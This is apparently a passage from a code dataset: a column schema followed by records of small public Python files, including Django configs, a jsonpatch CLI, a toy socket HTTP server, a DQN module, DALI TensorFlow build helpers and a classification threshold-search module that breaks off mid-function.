blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
150bd0efd216bec9d3f05d67433ec1b07b6a88dc
|
edebce2da16b500683cb9777c37924bf3dcd2895
|
/myself/blog/blog/urls.py
|
77bd8a1bcc2b85d70290d5fed2334d1b66011e47
|
[] |
no_license
|
yxd2018/Test
|
d26778b0b826f663b665f765b0851b8f2d04a7f7
|
9fba56a9d7540ce35e29bf886248e05fc090c21d
|
refs/heads/master
| 2020-03-08T07:47:42.445969
| 2018-04-04T02:58:12
| 2018-04-04T02:58:12
| 128,003,604
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 940
|
py
|
"""blog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from app01 import views
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'ckeditor', include('ckeditor_uploader.urls')),
url(r'^index$', views.index, name='index'),
url(r'^index2/(\d+)', views.index2, name='index2'),
]
|
[
"yxd0822@163.com"
] |
yxd0822@163.com
|
24826e7db681b08ab83bbbc5d2e7edf0c4dc493b
|
0604fb807a330892b82de2f13e43d1e288f33043
|
/tests/.venv/bin/jsonpatch
|
2e23b784b185a3e40e966bb637c392a564d0b346
|
[] |
no_license
|
wtsi-hgi/openstack_report
|
fe679c33d776ba5c181d5a0a806122d8fe89cc27
|
1e9fddaddf82bca6290a5d52792b7df608600804
|
refs/heads/master
| 2023-01-23T07:46:39.275387
| 2021-02-19T13:43:35
| 2021-02-19T13:43:35
| 203,331,160
| 0
| 0
| null | 2023-01-04T09:03:16
| 2019-08-20T08:15:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,696
|
#!/Users/pa11/Code/openstack_report/.venv/bin/python3
# -*- coding: utf-8 -*-
import sys
import os.path
import json
import jsonpatch
import tempfile
import argparse
parser = argparse.ArgumentParser(
description='Apply a JSON patch on a JSON file')
parser.add_argument('ORIGINAL', type=argparse.FileType('r'),
help='Original file')
parser.add_argument('PATCH', type=argparse.FileType('r'),
nargs='?', default=sys.stdin,
help='Patch file (read from stdin if omitted)')
parser.add_argument('--indent', type=int, default=None,
help='Indent output by n spaces')
parser.add_argument('-b', '--backup', action='store_true',
help='Back up ORIGINAL if modifying in-place')
parser.add_argument('-i', '--in-place', action='store_true',
help='Modify ORIGINAL in-place instead of to stdout')
parser.add_argument('-v', '--version', action='version',
version='%(prog)s ' + jsonpatch.__version__)
def main():
try:
patch_files()
except KeyboardInterrupt:
sys.exit(1)
def patch_files():
""" Diffs two JSON files and prints a patch """
args = parser.parse_args()
doc = json.load(args.ORIGINAL)
patch = json.load(args.PATCH)
result = jsonpatch.apply_patch(doc, patch)
if args.in_place:
dirname = os.path.abspath(os.path.dirname(args.ORIGINAL.name))
try:
# Attempt to replace the file atomically. We do this by
# creating a temporary file in the same directory as the
# original file so we can atomically move the new file over
# the original later. (This is done in the same directory
# because atomic renames do not work across mount points.)
fd, pathname = tempfile.mkstemp(dir=dirname)
fp = os.fdopen(fd, 'w')
atomic = True
except OSError:
# We failed to create the temporary file for an atomic
# replace, so fall back to non-atomic mode by backing up
# the original (if desired) and writing a new file.
if args.backup:
os.rename(args.ORIGINAL.name, args.ORIGINAL.name + '.orig')
fp = open(args.ORIGINAL.name, 'w')
atomic = False
else:
# Since we're not replacing the original file in-place, write
# the modified JSON to stdout instead.
fp = sys.stdout
# By this point we have some sort of file object we can write the
# modified JSON to.
json.dump(result, fp, indent=args.indent)
fp.write('\n')
if args.in_place:
# Close the new file. If we aren't replacing atomically, this
# is our last step, since everything else is already in place.
fp.close()
if atomic:
try:
# Complete the atomic replace by linking the original
# to a backup (if desired), fixing up the permissions
# on the temporary file, and moving it into place.
if args.backup:
os.link(args.ORIGINAL.name, args.ORIGINAL.name + '.orig')
os.chmod(pathname, os.stat(args.ORIGINAL.name).st_mode)
os.rename(pathname, args.ORIGINAL.name)
except OSError:
# In the event we could not actually do the atomic
# replace, unlink the original to move it out of the
# way and finally move the temporary file into place.
os.unlink(args.ORIGINAL.name)
os.rename(pathname, args.ORIGINAL.name)
if __name__ == "__main__":
main()
|
[
"pa11@mib113623i.internal.sanger.ac.uk"
] |
pa11@mib113623i.internal.sanger.ac.uk
|
|
6299e9b31dc2732eb897d86e22688c2d2019c47e
|
216f59e44324d19b4978e221e548f4dc88a96de2
|
/Day41/01 手写socket server.py
|
b5c6751fb445f149158f3a3a4ff89e676c7c8de0
|
[] |
no_license
|
klandhu/Python-S14
|
b69f85d749e26adaf1edfadf8f690cce25776bab
|
6171be56cc01ebdb11dffc0049e43727771f10fd
|
refs/heads/master
| 2020-04-06T09:53:01.596595
| 2018-11-16T10:06:40
| 2018-11-16T10:06:40
| 157,357,879
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
py
|
import socket
sk =socket.socket()
sk.bind(('127.0.0.1',8080))
sk.listen(5)
while 1:
conn, addr = sk.accept()
data = conn.recv(9000)
print(data)
conn.send(b'HTTP/1.1 200 OK\r\n\r\n')
#conn.send(b'o98k')
with open("test.html","rb") as f:
conn.send(f.read())
conn.close()
|
[
"nan.hu@gometech.com.cn"
] |
nan.hu@gometech.com.cn
|
556a0be4744a9543cc7d75387a5797c1e97cdc25
|
d46558f344c9f20205ee3c9c3f4fc4c3450500c8
|
/project2/task2/Reducer2.py
|
a061d28250bea81f2dc4126f1fc9250f8c082b09
|
[] |
no_license
|
xiezhw3/bigDataProject
|
8d6545d0853dfbec4dbd47337337711d14fffc9a
|
57a1905f924fb86ed541161334ecf6696e755e57
|
refs/heads/master
| 2016-08-05T06:58:13.962850
| 2015-06-11T13:19:39
| 2015-06-11T13:19:39
| 37,263,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 416
|
py
|
#! /usr/bin/python
import sys, heapq
from operator import *
oldKey = None
tags = {}
for line in sys.stdin:
data_mapped = line.strip().split('\t')
if len(data_mapped) != 3:
continue
zero, tag, num = data_mapped
if not tag in tags.keys():
tags[tag] = 0
tags[tag] += int(num)
top100 = heapq.nlargest(100, tags, key = lambda x: (tags[x], x))
for item in top100:
print item
|
[
"xiezhw3@gmail.com"
] |
xiezhw3@gmail.com
|
c274dbbe37b4a409b549b682a826a50e9a4c7009
|
e74d43d46819068bb51724e3c3485796065af1f7
|
/strings_and_array/P1_2.py
|
c60d7c8c530f1fe0e33ebb9eb724e414e7484646
|
[] |
no_license
|
sunnyyants/crackingPython
|
30a06de78525773fdf6d18e55f20e9970d4031b5
|
6197e916dfd47be61319103c7d482d4bae0f8f93
|
refs/heads/master
| 2021-01-15T23:02:16.865043
| 2014-01-12T20:06:07
| 2014-01-12T20:06:07
| 13,941,490
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
__author__ = 'SunnyYan'
# Reverse a null terminal string
# I decide to use 3 different methods
def method1(strings):
if len(strings) == 1:
return strings
return method1(strings[1::1]) + strings[0]
def method2(strings):
return strings[::-1]
def method3(strings):
i = len(strings)-1
result = []
while(i >= 0):
result.append(strings[i])
i -= 1
return ''.join(result)
print method1("abcdefg")
print method2("1234567")
print method3("leveleivia")
|
[
"sunnyyants@gmail.com"
] |
sunnyyants@gmail.com
|
84db0d6012e0ac0180354fa1f6e290665ac7f820
|
9407dc0d46e266bc76eb9572731e0e9924364f61
|
/vikalp/local_settings.py
|
74a2ab2a4fbf0a5bd37afe0d3f76aaa66e52d7e2
|
[] |
no_license
|
mihirk/vikalp
|
232aac510f98f05572d910645a070772a55a9051
|
bb29624f438ce2e9e0e8482f3fe645f7b5ae32e1
|
refs/heads/master
| 2021-01-18T03:37:39.050602
| 2014-01-03T13:46:46
| 2014-01-03T13:46:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 664
|
py
|
# DEBUG = True
from .settings import * # noqa
TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
COMPRESS_ENABLED = True
DATABASES = {
"default": {
# Ends with "postgresql_psycopg2", "mysql", "sqlite3" or "oracle".
"ENGINE": "django.db.backends.sqlite3",
# DB name or path to database file if using sqlite3.
"NAME": "dev.db",
# Not used with sqlite3.
"USER": "",
# Not used with sqlite3.
"PASSWORD": "",
# Set to empty string for localhost. Not used with sqlite3.
"HOST": "",
# Set to empty string for default. Not used with sqlite3.
"PORT": "",
}
}
|
[
"mihir.khatwani@gmail.com"
] |
mihir.khatwani@gmail.com
|
49ad2bf24f87bb8e881b32002df4a56eb1cde4e1
|
719febb378f20e9c63aefd521ab6ceb1a05e836f
|
/runserver.py
|
64149946f28bb657ca2cdd6e3a13899d4a7af172
|
[] |
no_license
|
shuyangli/paradigms-game
|
303336daa3b6e4a4d99165158b45ccbfa14ce95f
|
22fa2d047facdcd65ec71f5f9c668c87afbaa419
|
refs/heads/master
| 2016-09-05T19:54:34.899171
| 2015-05-07T04:27:56
| 2015-05-07T04:27:56
| 34,142,667
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
import argparse
from castle_server import CastleServer
if __name__ == '__main__':
# Parse command line arguments
parser = argparse.ArgumentParser(description="Server for Castles game.")
parser.add_argument("-p", "--port", type=int, default=9001, dest="port", help="port number")
parser.add_argument("-d", "--debug", action="store_true", dest="debug", help="enable debug mode")
args = parser.parse_args()
# Run server
server = CastleServer(args.port, args.debug)
server.start()
|
[
"shuyang.li.95@gmail.com"
] |
shuyang.li.95@gmail.com
|
d4fddba0fc023aa2bf4ded9cd8bd5b50cf21c4d4
|
b8b6bd8f14db95d74df1f27e2c7e5e61d0e831e2
|
/src/DQN.py
|
470ebda84eea9e1b2e6f2c5636f8658203cdabfa
|
[] |
no_license
|
JustCallMeDavid/USRL4RS
|
fa6f2c83cb8e0e11381eba15deaeb5b21820b56d
|
ddaeb75f7a17ca484196a2e985b94e64cbed1c08
|
refs/heads/main
| 2023-08-27T15:08:29.317092
| 2021-10-11T13:55:58
| 2021-10-11T13:55:58
| 415,513,534
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 388
|
py
|
import torch
class DQNet(torch.nn.Module):
def __init__(self, emb_size, hidden_size, out_size):
super(DQNet, self).__init__()
self.fc1 = torch.nn.Linear(emb_size, hidden_size)
self.fc2 = torch.nn.Linear(hidden_size, out_size)
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(self.fc2(self.relu(self.fc1(x.squeeze()))))
|
[
"d.gradinariu@hotmail.com"
] |
d.gradinariu@hotmail.com
|
aaaad40aad30f39b1b13f1908e2db82289f5c51d
|
ee1b2303bc3d7d476f61bd5268baa707279fc454
|
/LAS_Processor_v4.py
|
ce96857739842a3c9c047b2a395204b6393cea41
|
[] |
no_license
|
GeospatialDaryl/objLAS
|
b90853fd6ff494eba39de72ed2284d9e0d3f34e3
|
a1f85266fdaf9031dcc4cf442fdd9512e51e7b82
|
refs/heads/master
| 2021-01-06T20:46:41.279218
| 2015-09-23T17:07:06
| 2015-09-23T17:07:06
| 31,977,875
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,101
|
py
|
import ClassLASObj_v13
from ClassLASObj_v13 import *
#Class LTKPaths contains Machine Specific Paths
import ModuleLiDARtools_v1
from ModuleLiDARtools_v1 import * #Paths
import os
#import arcpy
#import arcgisscripting
#gp = arcgisscripting.create(9.3)
#gp.AddToolbox("C:\Program Files (x86)\ArcGIS\ArcToolBox\Toolboxes\Conversion Tools.tbx")
#gp.overwriteoutput = 1
utmn83 = "PROJCS['NAD_1983_UTM_Zone_10N',GEOGCS['GCS_North_American_1983',DATUM['D_North_American_1983',SPHEROID['GRS_1980',6378137.0,298.257222101]],PRIMEM['Greenwich',0.0],UNIT['Degree',0.0174532925199433]],PROJECTION['Transverse_Mercator'],PARAMETER['False_Easting',500000.0],PARAMETER['False_Northing',0.0],PARAMETER['Central_Meridian',-123.0],PARAMETER['Scale_Factor',0.9996],PARAMETER['Latitude_Of_Origin',0.0],UNIT['Meter',1.0]]"
#instantiate Paths object
workPaths = Paths()
#create empty directory list of las files
listLASObj = []
# ##############ADJUST THE Target HERE ##########################
#thisOperationPath = workPaths.pathSctt
thisOperationPath = workPaths.pathShastaRepair
multiProcessor_Count = 8
# ###############################################################
workPaths.lasworkspace = thisOperationPath+"LAS\\pt2\\" #this needed toggling back from LAS_b 12/22/2011
workPaths.dtmworkspace = thisOperationPath+"DTM\\"
workPaths.chmworkspace = thisOperationPath+"CHM\\"
workPaths.lasExtent = thisOperationPath+"LAS\\"
workPaths.csvworkspace = thisOperationPath+"CSV\\"
workPaths.lasnorm = thisOperationPath+"LAS_norm\\"
workPaths.dem = thisOperationPath+"dem\\"
# ###############################################################
# Make a list of LAS in the directory of interest
dirList=os.listdir(workPaths.lasExtent) # USE the LAS not LAS_b to make this list
# ## Instantiate the list of LASObjs
for fname in dirList:
if "las" in fname:
nameLASObj = LASObj(workPaths.lasworkspace+fname,workPaths.lasExtent+fname)
print nameLASObj.las_name
listLASObj.append(nameLASObj)
del nameLASObj
countLASObj = 0
for LASObjs in listLASObj:
countLASObj = countLASObj + 1
print str(countLASObj)+" Total Tiles"
#Declare test LASObj object
test = listLASObj[0]
counter = 0
for LASObjs in listLASObj:
counter = counter + 1
print "Tile "+LASObjs.las_name+", "+str(counter)+" of "+str(countLASObj)
#LASObjs.makeCHM_StatePlaneFt(workPaths)
print "processing the tile . . ."
#LASObjs.makeCloudMetrics(workPaths)
#LASObjs.makeNormalizedLAS(workPaths,'C:\\Scratch\\ShastaRepair_LAS\\DEM\\Shasta_dem.img')
#LASObjs.makeNormalizedLAS_arcpy(workPaths,'C:\\Scratch\\ShastaRepair_LAS\\DEM\\Shasta_dem.img')
LASObjs.makeNormalizedLAS_arcpy(workPaths,"C:\\Scratch\\ShastaRepair_LAS\\tempRasWork\\repDEM.img")
#LASObjs.makeNormalizedLAS_pass(workPaths,'C:\\Scratch\\ShastaRepair_LAS\\tempRasWork\\repDEM.img')
#makeNormalizedLAS_MP(workPaths,8,"C:\\Scratch\\dem_be_1m.img")
#LASObjs.makeMetrics(workPaths)
#LASObjs.makeMetrics(workPaths,6.,["cover"])
#LASObjs.makeMetrics(workPaths,9.,["cover"])
|
[
"daryl_van_dyke@fws.gov"
] |
daryl_van_dyke@fws.gov
|
afb08de55adda6d146170c5964c70216e97605d2
|
14b44146a4d6b9780390a0dccbaed60156abb0f8
|
/blog/models.py
|
4d83b10414cb41f53fb11bd47c962f4b08b1b9a5
|
[] |
no_license
|
lillian7/wopaproject
|
8e15869cc8c42b2a89c8a809d0f805fab0814efa
|
68cde33a1539d7051a3c377e0404938a2c77fd5f
|
refs/heads/master
| 2020-05-17T21:38:03.503813
| 2014-08-08T08:18:22
| 2014-08-08T08:18:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,128
|
py
|
from django.db import models
from django.db.models import permalink
# Create your models here.
#first a database table called blog
class Blog(models.Model):
#the fields to be created in the table blogs
title = models.CharField(max_length=100, db_index=True)
slug = models.SlugField(max_length=100, db_index=True)
body = models.TextField()
posted = models.DateTimeField(db_index =True, auto_now_add =True)
category = models.ForeignKey('blog.Category')
#unicode will set the text reference 'title' for each record
def __unicode__(self):
return '%s' % self.title
@permalink
#decorator to hold the right url format
def get_absolute_url(self):
return ('view_blog_post', None, {'slug': self.slug})
#another database table called ctegory
class Category(models.Model):
title = models.CharField(max_length = 100, db_index = True)
slug = models.SlugField(max_length = 100, db_index = True)
def __unicode__(self):
return '%s' % self.title
@permalink
def get_absolute_url(self):
return ('view_blog_category', None, {'slug': self.slug})
|
[
"lnassanga@gmail.com"
] |
lnassanga@gmail.com
|
cab89a174139d9965e8c64cdb0a66f9260beeedf
|
4b758ca583d2a58d4d711381405e024109a0f08f
|
/dali_tf_plugin/dali_tf_plugin_utils.py
|
54baaa57acf8c189bf3870be8426eaa03913c41c
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
ConnectionMaster/DALI
|
76ff07b2fa3f62490b059088c88ade7570130ff4
|
6b90519d2c209d705e8912a5f00b71a018aeaa52
|
refs/heads/master
| 2023-04-14T13:04:57.520421
| 2021-01-22T16:34:31
| 2021-01-22T16:34:31
| 187,683,855
| 1
| 1
|
Apache-2.0
| 2023-04-03T23:45:28
| 2019-05-20T17:18:56
|
C++
|
UTF-8
|
Python
| false
| false
| 5,971
|
py
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import os
import re
import sys
import platform
import fnmatch
from distutils.version import StrictVersion
# Find file matching `pattern` in `path`
def find(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
# Get path to python module `module_name`
def get_module_path(module_name):
module_path = ''
for d in sys.path:
possible_path = os.path.join(d, module_name)
# skip current dir as this is plugin dir
if os.path.isdir(possible_path) and len(d) != 0:
module_path = possible_path
break
return module_path
# Get compiler version used to build tensorflow
def get_tf_compiler_version():
tensorflow_libs = find('libtensorflow_framework*so*', get_module_path('tensorflow'))
if not tensorflow_libs:
tensorflow_libs = find('libtensorflow_framework*so*', get_module_path('tensorflow_core'))
if not tensorflow_libs:
return ''
lib = tensorflow_libs[0]
cmd = 'strings -a ' + lib + ' | grep "GCC: ("'
s = str(subprocess.check_output(cmd, shell=True))
lines = s.split('\\n')
ret_ver = ''
for line in lines:
res = re.search("GCC:\s*\(.*\)\s*(\d+.\d+).\d+", line)
if res:
ver = res.group(1)
if not ret_ver or StrictVersion(ret_ver) < StrictVersion(ver):
ret_ver = ver
return ret_ver
# Get current tensorflow version
def get_tf_version():
try:
import pkg_resources
s = pkg_resources.get_distribution("tensorflow-gpu").version
except:
# pkg_resources.get_distribution doesn't work well with conda installed packages
try:
import tensorflow as tf
s = tf.__version__
except:
return ""
version = re.search("(\d+.\d+).\d+", s).group(1)
return version
# Get C++ compiler
def get_cpp_compiler():
return os.environ.get('CXX') or 'g++'
# Get C++ compiler version
def get_cpp_compiler_version():
cmd = get_cpp_compiler() + ' --version | head -1 | grep "[c|g]++ ("'
s = str(subprocess.check_output(cmd, shell=True).strip())
version = re.search("[g|c]\+\+\s*\(.*\)\s*(\d+.\d+).\d+", s).group(1)
return version
# Runs `which` program
def which(program):
try:
return subprocess.check_output('which ' + program, shell=True).strip()
except:
return None
# Checks whether we are inside a conda env
def is_conda_env():
return True if os.environ.get('CONDA_PREFIX') else False
# Get compile and link flags for installed tensorflow
def get_tf_build_flags():
tf_cflags = ''
tf_lflags = ''
try:
import tensorflow as tensorflow
tf_cflags=" ".join(tensorflow.sysconfig.get_compile_flags())
tf_lflags=" ".join(tensorflow.sysconfig.get_link_flags())
except:
tensorflow_path = get_module_path('tensorflow')
if tensorflow_path != '':
tf_cflags=" ".join(["-I" + tensorflow_path + "/include", "-I" + tensorflow_path + "/include/external/nsync/public", "-D_GLIBCXX_USE_CXX11_ABI=0"])
tf_lflags=" ".join(["-L" + tensorflow_path, "-ltensorflow_framework"])
if tf_cflags == '' and tf_lflags == '':
raise ImportError('Could not find Tensorflow. Tensorflow must be installed before installing NVIDIA DALI TF plugin')
return (tf_cflags, tf_lflags)
# Get compile and link flags for installed DALI
def get_dali_build_flags():
dali_cflags = ''
dali_lflags = ''
try:
import nvidia.dali.sysconfig as dali_sc
dali_lib_path = dali_sc.get_lib_dir()
# We are linking with DALI's C library, so we don't need the C++ compile flags
# including the CXX11_ABI setting
dali_cflags=" ".join(dali_sc.get_include_flags())
dali_lflags=" ".join(dali_sc.get_link_flags())
except:
dali_path = get_module_path('nvidia/dali')
if dali_path != '':
dali_cflags=" ".join(["-I" + dali_path + "/include"])
dali_lflags=" ".join(["-L" + dali_path, "-ldali"])
if dali_cflags == '' and dali_lflags == '':
raise ImportError('Could not find DALI.')
return (dali_cflags, dali_lflags)
# Get compile and link flags for installed CUDA
def get_cuda_build_flags():
cuda_cflags = ''
cuda_lflags = ''
cuda_home = os.environ.get('CUDA_HOME')
if not cuda_home:
cuda_home = '/usr/local/cuda'
cuda_cflags=" ".join(["-I" + cuda_home + "/include"])
cuda_lflags=" ".join([])
return (cuda_cflags, cuda_lflags)
def find_available_prebuilt_tf(requested_version, available_libs):
req_ver_first, req_ver_second = [int(v) for v in requested_version.split('.', 2)]
selected_ver = None
for file in available_libs:
re_match = re.search(".*(\d+)_(\d+).*", file)
if re_match is None:
continue
ver_first, ver_second = [int(v) for v in re_match.groups()]
if ver_first == req_ver_first:
if ver_second <= req_ver_second and (selected_ver is None or selected_ver < (ver_first, ver_second)):
selected_ver = (ver_first, ver_second)
return '.'.join([str(v) for v in selected_ver]) if selected_ver is not None else None
|
[
"noreply@github.com"
] |
ConnectionMaster.noreply@github.com
|
6820ae5641d1fe67e470fc362c090c11417e87bb
|
90343974013351bd925a403739ba77c45084fd7d
|
/Frankot_Chellapa.py
|
0a9466cfce0946f53869687dc2dae5e4ea7c96d6
|
[] |
no_license
|
cosecdelta/Computer-Vision-Basic-Codes
|
a91564855d0faa283129f5d4753d3a2434379891
|
bf95f1d25e4fdf9875701bb975355fd5c327e8cd
|
refs/heads/main
| 2023-03-05T00:21:14.845060
| 2021-02-17T22:19:29
| 2021-02-17T22:19:29
| 329,207,073
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,172
|
py
|
## Default modules imported. Import more if you need to.
import numpy as np
from skimage.io import imread, imsave
## Fill out these functions yourself
# Inputs:
# nrm: HxWx3. Unit normal vectors at each location. All zeros at mask == 0
# mask: A 0-1 mask of size HxW, showing where observed data is 'valid'.
# lmda: Scalar value of lambda to be used for regularizer weight as in slides.
#
# Returns depth map Z of size HxW.
#
# Be careful about division by 0.
#
# Implement in Fourier Domain / Frankot-Chellappa
def kernpad(K,size):
kernel_size = np.array(K.shape)
image_size = np.array(size)
pad_length = image_size - kernel_size
center_pixel = (kernel_size-1)//2
padded_img = np.pad(K,((0,pad_length[0]),(0,pad_length[1])))
circular_rotate_kernel = np.roll(padded_img, -int(center_pixel[0]), axis=0) #Rotating along the rows
circular_rotate_kernel = np.roll(padded_img, -int(center_pixel[1]), axis=1) #Rotating along the columns
return circular_rotate_kernel
def ntod(nrm, mask, lmda):
nrm_flat = np.reshape(nrm,(-1,3))
mask_flat = np.broadcast_to(np.reshape(mask,(-1,1)),nrm_flat.shape)
nrm_flat = nrm_flat*mask_flat
nrm_flat = np.reshape(nrm_flat,nrm.shape)
gx = -np.divide(nrm_flat[:,:,0],nrm_flat[:,:,2])
gy = -np.divide(nrm_flat[:,:,0],nrm_flat[:,:,2])
gx[np.isnan(gx)] = 0
gy[np.isnan(gy)] = 0
gu = np.fft.fft2(gx)
gv = np.fft.fft2(gy)
fx = np.reshape(np.array([0.5,0,-0.5]),(1,3))
fy = -np.transpose(fx)
fu = np.fft.fft2(kernpad(fx, gu.shape))
fv = np.fft.fft2(kernpad(fy, gv.shape))
fr = np.array([[-1/9,-1/9,-1/9],[-1/9,8/9,-1/9],[-1/9,-1/9,-1/9]])
fr_uv = np.fft.fft2(kernpad(fr, gu.shape))
fz_final = (np.conj(fu)*gu + np.conj(fv)*gv)/(np.square(abs(fu)) + np.square(abs(fv)) + lmda*np.square(abs(fr_uv)))
final_depth = np.real(np.fft.ifft2(fz_final))
return final_depth
########################## Support code below
from os.path import normpath as fn # Fixes window/linux path conventions
import warnings
warnings.filterwarnings('ignore')
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
#### Main function
#nrm = imread(fn('inputs/phstereo/true_normals.png'))
# Un-comment next line to read your output instead
nrm = imread(fn('outputs/prob3_nrm.png'))
mask = np.float32(imread(fn('inputs/phstereo/mask.png')) > 0)
nrm = np.float32(nrm/255.0)
nrm = nrm*2.0-1.0
nrm = nrm * mask[:,:,np.newaxis]
# Main Call
Z = ntod(nrm,mask,1e-6)
# Plot 3D shape
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x,y = np.meshgrid(np.float32(range(nrm.shape[1])),np.float32(range(nrm.shape[0])))
x = x - np.mean(x[:])
y = y - np.mean(y[:])
Zmsk = Z.copy()
Zmsk[mask == 0] = np.nan
Zmsk = Zmsk - np.nanmedian(Zmsk[:])
lim = 100
ax.plot_surface(x,-y,Zmsk, \
linewidth=0,cmap=cm.inferno,shade=True,\
vmin=-lim,vmax=lim)
ax.set_xlim3d(-450,450)
ax.set_ylim3d(-450,450)
ax.set_zlim3d(-450,450)
plt.show()
|
[
"noreply@github.com"
] |
cosecdelta.noreply@github.com
|
140539ee859d3d8844b1506b84e1853570ab09c1
|
246729c419e99e237065635f693f44fb0a62b41f
|
/catalyst/contrib/utils/thresholds.py
|
907e853b6514c5a2d8057a66a557ccade60e34b4
|
[
"Apache-2.0"
] |
permissive
|
Pandinosaurus/catalyst
|
d3fb311c26ec943b4ac483ba229c3dd1e7a7cff6
|
117b0cc9256be7af6122f6fcc4f95a0e5a2adbc5
|
refs/heads/master
| 2022-05-06T02:38:28.119220
| 2021-08-30T07:55:33
| 2021-08-30T07:55:33
| 207,519,426
| 0
| 0
|
Apache-2.0
| 2021-08-31T03:49:16
| 2019-09-10T09:35:11
|
Python
|
UTF-8
|
Python
| false
| false
| 16,883
|
py
|
from typing import Callable, List, Tuple
from collections import defaultdict
import enum
from functools import partial
import numpy as np
from sklearn.model_selection import RepeatedStratifiedKFold
METRIC_FN = Callable[[np.ndarray, np.ndarray], float]
class ThresholdMode(str, enum.Enum):
"""Available threshold search strategies types."""
NOOP = noop = "noop" # noqa: WPS115
MULTILABEL = multilabel = "multilabel" # noqa: WPS115
MULTICLASS = multiclass = "multiclass" # noqa: WPS115
def get_baseline_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
) -> Tuple[float, List[float]]:
"""Returns baseline thresholds for multiclass/multilabel classification.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, num_classes]
labels: ground truth labels,
numpy array with shape [num_examples, num_classes]
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
thresholds = [0.5] * num_classes
predictions = np.greater(scores, thresholds).astype(np.int32)
best_metric = objective(labels, predictions)
return best_metric, thresholds
def get_binary_threshold(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN, num_thresholds: int = 100,
) -> Tuple[float, float]:
"""Finds best threshold for binary classification task based on cross-validation estimates.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, ]
labels: ground truth labels, numpy array with shape [num_examples, ]
objective: callable function, metric which we want to maximize
num_thresholds: number of thresholds ot try for each class
Returns:
tuple with best found objective score and threshold
"""
thresholds = np.linspace(scores.min(), scores.max(), num=num_thresholds)
metric_values = []
for threshold in thresholds:
predictions = (scores >= threshold).astype(np.int32)
if np.sum(predictions) > 0:
metric_value = objective(labels, predictions)
metric_values.append(metric_value)
else:
metric_values.append(0.0)
if np.max(metric_values) == 0.0:
best_metric_value = 0.0
best_threshold = 1.0
else:
best_metric_value = metric_values[np.argmax(metric_values)]
best_threshold = thresholds[np.argmax(metric_values)]
return best_metric_value, best_threshold
def get_multiclass_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
) -> Tuple[List[float], List[float]]:
"""Finds best thresholds for multiclass classification task.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, num_classes]
labels: ground truth labels, numpy array with shape [num_examples, num_classes]
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
metrics = [0.0] * num_classes
thresholds = [0.0] * num_classes
# score threshold -> classes with such score
classes_by_threshold = defaultdict(list)
for class_index in range(num_classes):
for score in np.unique(scores[:, class_index]):
classes_by_threshold[score].append(class_index)
for threshold in sorted(classes_by_threshold):
for class_index in classes_by_threshold[threshold]:
metric_value = objective(labels[:, class_index], scores[:, class_index] >= threshold)
if metric_value > metrics[class_index]:
metrics[class_index] = metric_value
